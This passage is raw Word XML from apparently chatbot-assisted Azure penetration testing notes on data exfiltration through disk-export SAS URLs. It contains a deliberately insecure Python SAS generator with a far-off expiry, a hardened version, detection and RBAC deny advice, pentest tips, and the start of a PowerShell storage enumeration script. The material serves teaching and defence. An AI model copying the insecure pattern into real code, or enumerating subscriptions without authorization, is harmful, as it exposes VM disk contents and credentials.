      <w:r w:rsidRPr="00946D3E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>grant SAS access</w:t>
      </w:r>
      <w:r w:rsidRPr="00946D3E">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> via a script or custom provider logic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E281D4F" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="00946D3E" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73F94141" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="00946D3E" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00946D3E">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>⚠️</w:t>
      </w:r>
      <w:r w:rsidRPr="00946D3E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Detection &amp; Prevention</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C49477C" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="00946D3E" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="258"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00946D3E">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Log and alert on:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62483709" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="00946D3E" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="258"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00946D3E">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Microsoft.Compute/disks/beginGetAccess/action</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0774500E" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="00946D3E" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="258"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00946D3E">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Prevent with:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="142FDF43" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="00946D3E" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="258"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00946D3E">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Role-based access control (deny Microsoft.Compute/disks/* to untrusted users)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B94CD55" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="00946D3E" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="258"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00946D3E">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Azure Policy to restrict disk export</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6695EE00" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="00946D3E" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="258"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00946D3E">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Defender for Cloud alerts on disk operations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D851B7" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25C3998C" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Azure Disk Export via SAS URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE64EF3" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D6F97D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Here's a corrected, rewritten, and summarized version of your content in the context of </w:t>
      </w:r>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Azure Penetration Testing</w:t>
      </w:r>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>, focusing on how attackers might exploit misconfigured SAS URLs and how to identify and secure such vectors:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D220674" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="00B92848" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D5E4BB6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🔓</w:t>
      </w:r>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Azure Disk Export via SAS URL – Penetration Testing Perspective</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="758B481A" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="00B92848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Overview:</w:t>
      </w:r>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">In Azure, exporting a managed disk via a </w:t>
      </w:r>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Shared Access Signature (SAS) URL</w:t>
      </w:r>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a legitimate operation used for migration or backup. However, when misconfigured, this feature becomes a serious security risk, allowing attackers to </w:t>
      </w:r>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>exfiltrate entire virtual disk contents</w:t>
      </w:r>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> without authentication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B59F61E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🚨</w:t>
      </w:r>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Vulnerable Pattern (Noncompliant Code)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4543D3A9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from azure.storage.blob import BlobServiceClient</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="561BD07C" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="00B92848" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="041A19F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lastRenderedPageBreak/>
        <w:t>def export_disk_to_sas_url(disk_name, container_name, storage_account_name, storage_account_key):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7861CD7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blob_service_client = BlobServiceClient(account_url=f"https://{storage_account_name}.blob.core.windows.net", credential=storage_account_key)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B1396A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container_client = blob_service_client.get_container_client(container_name)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1986A76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sas_url = container_client.get_blob_client(disk_name).url + '?' + container_client.generate_shared_access_signature(permission='r', expiry='2030-01-01')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD02EF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return sas_url</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A6CE2B" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="00B92848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Attack Vector:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="183FF495" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="00B92848" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="283"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Hardcoded long-lived expiry (2030-01-01)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6896AB01" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="00B92848" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="283"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>No IP or protocol restrictions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="772B2C03" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="00B92848" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="283"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Overly permissive SAS token</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E446972" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="00B92848" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="283"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>URL can be reused and shared anonymously</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="318E2C1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In a pentest, discovery of such a URL (via logs, storage account enumeration, or leaked config) could allow </w:t>
      </w:r>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>download of entire VM disks</w:t>
      </w:r>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>, potentially exposing credentials, SSH keys, or cached tokens.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="363DEA29" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="00B92848" w:rsidRDefault="00000000" w:rsidP="00F265C5">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:pict w14:anchorId="4A9D13CF">
          <v:rect id="_x0000_i1032" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="004CFA25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✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Secure Implementation (Compliant Code)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2425095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from azure.storage.blob import BlobServiceClient, BlobSasPermissions, generate_blob_sas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE4861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from datetime import datetime, timedelta</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F99BD1" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="00B92848" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2ADB6AE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def export_disk_to_sas_url(disk_name, container_name, storage_account_name, storage_account_key):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA01E4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blob_service_client = BlobServiceClient(account_url=f"https://{storage_account_name}.blob.core.windows.net", credential=storage_account_key)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB6F3F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container_client = blob_service_client.get_container_client(container_name)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B9567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expiry_time = datetime.utcnow() + timedelta(days=7)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09360A7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permissions = BlobSasPermissions(read=True)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="793D244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sas_token = generate_blob_sas(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39A624A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account_name=storage_account_name,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D887D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container_name=container_name,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EE0EC6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blob_name=disk_name,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25DABB7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account_key=storage_account_key,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53574C2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permission=permissions,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57105DC9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expiry=expiry_time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29EAD30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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30AE28F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sas_url = container_client.get_blob_client(disk_name).url + '?' + sas_token</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2466E79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return sas_url</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ACEA355" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="00B92848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Security Improvements:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="045CBED0" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="00B92848" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="284"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Short-lived token (7-day expiry)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7510D740" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="00B92848" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="284"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Read-only permissions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="221E9A1A" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="00B92848" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="284"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Uses official generate_blob_sas function for granularity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B0AA7FF" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="00B92848" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="284"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Better suited for logging and auditing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32DB9F3B" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="00B92848" w:rsidRDefault="00000000" w:rsidP="00F265C5">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:pict w14:anchorId="070DBCE7">
          <v:rect id="_x0000_i1033" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E7859C0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🛡️</w:t>
      </w:r>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Pentest Tips</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A17E0E2" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="00B92848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What to look for during a pentest:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="611B188A" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="00B92848" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="285"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Publicly exposed or leaked SAS URLs (e.g., in GitHub, logs, or config files)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67894930" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="00B92848" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="285"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>SAS tokens with excessive permissions or no expiry</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C99539" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="00B92848" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="285"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Misconfigured storage accounts (anonymous access enabled)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="086E7CEF" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="00B92848" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="285"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Lack of Azure Monitor/Defender alerts on disk export events</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11BB8C68" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="00B92848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Recommended Mitigations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6306325E" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="00B92848" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="286"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Enforce short-lived, scoped SAS tokens with IP/protocol restrictions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FC73003" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="00B92848" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="286"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Log and alert on SAS URL generation and disk export actions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1789EA90" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="00B92848" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="286"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Regularly audit SAS tokens and revoke unused ones</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F85960" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="00B92848" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="286"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Use managed identities and RBAC over access keys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72898127" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="00B92848" w:rsidRDefault="00000000" w:rsidP="00F265C5">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:pict w14:anchorId="35148F15">
          <v:rect id="_x0000_i1034" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="202CA7B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Would you like a Burp or PowerShell script to automate scanning or testing for exposed SAS URLs in a subscription?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C2BA6CB" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61AAAF3B" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Burp or PowerShell script to automate scanning or testing for exposed SAS URLs in a subscription</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C116371" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7220CD4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Great! Here's a </w:t>
      </w:r>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>PowerShell script</w:t>
      </w:r>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>enumerate and test for exposed Azure Storage SAS URLs</w:t>
      </w:r>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> related to disk exports in a target subscription. This can be used during an Azure penetration test to detect misconfigured or publicly accessible disk blobs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F70E87F" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="00B92848" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59945522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🔍</w:t>
      </w:r>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> PowerShell: Scan for Exposed SAS URLs in Azure Storage (Disk Export Focus)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A92E31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# Requires: Azure PowerShell Module (Az.Accounts, Az.Storage)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="601E350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Connect-AzAccount</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E63C2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$subscriptionId = "&lt;TARGET_SUBSCRIPTION_ID&gt;"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="789F0E8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Select-AzSubscription -SubscriptionId $subscriptionId</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08FDCAEF" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="00B92848" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B5EF48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# List all storage accounts in the subscription</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D8111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$storageAccounts = Get-AzStorageAccount</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0013CF90" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="00B92848" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="130E69A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foreach ($storageAccount in $storageAccounts) {</w:t>
      </w:r>
    </w:p>
